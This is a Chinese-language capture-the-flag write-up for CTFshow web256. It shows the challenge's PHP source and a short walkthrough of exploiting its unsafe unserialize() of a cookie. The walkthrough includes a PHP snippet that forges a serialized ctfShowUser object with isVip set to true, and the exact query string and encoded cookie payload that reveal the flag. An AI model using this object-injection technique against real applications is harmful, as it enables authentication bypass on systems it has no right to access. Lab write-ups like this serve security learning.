目錄

• 源碼
• 思路
• 題解
• 總結(jié)

---

源碼

<?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com*/error_reporting(0); highlight_file(__FILE__); include('flag.php');class ctfShowUser{public $username='xxxxxx';public $password='xxxxxx';public $isVip=false;public function checkVip(){return $this->isVip;}public function login($u,$p){return $this->username===$u&&$this->password===$p;}public function vipOneKeyGetFlag(){if($this->isVip){global $flag;if($this->username!==$this->password){echo "your flag is ".$flag;}}else{echo "no vip, no flag";}} }$username=$_GET['username']; $password=$_GET['password'];if(isset($username) && isset($password)){$user = unserialize($_COOKIE['user']); if($user->login($username,$password)){if($user->checkVip()){$user->vipOneKeyGetFlag();}}else{echo "no vip,no flag";} }

---

思路

這題關(guān)鍵點(diǎn)在于讓username不等于password,因?yàn)槎际怯?#61;==比較,所以我們傳入的username和password值不同就好了,然后再源碼里改成響應(yīng)的值然后反序列化就好啦,反序列化是可以修改變量的值的
if($this->username!==$this->password){

比如我傳入username=x,password=y,那么只要把類里的username和password的值改成x和y再反序列化就滿足條件啦

<?php class ctfShowUser{public $username='x';public $password='y';public $isVip=true; }echo(urlencode(serialize(new ctfShowUser())));

題解

get:?username=x&password=y cookie: user=O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A1%3A%22x%22%3Bs%3A8%3A%22password%22%3Bs%3A1%3A%22y%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

---

總結(jié)

水題

總結(jié)

以上是生活随笔為你收集整理的CTFshow 反序列化 web256的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。